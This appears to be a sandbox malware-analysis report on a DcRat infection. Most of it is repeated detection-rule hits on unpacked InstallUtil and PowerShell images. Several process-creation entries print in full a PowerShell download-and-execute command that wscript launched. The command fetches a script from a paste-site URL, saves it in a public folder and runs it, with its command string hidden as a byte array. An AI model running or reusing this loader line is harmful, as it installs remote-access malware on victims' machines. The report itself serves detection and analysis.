Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath) Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1 Jump to behavior
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
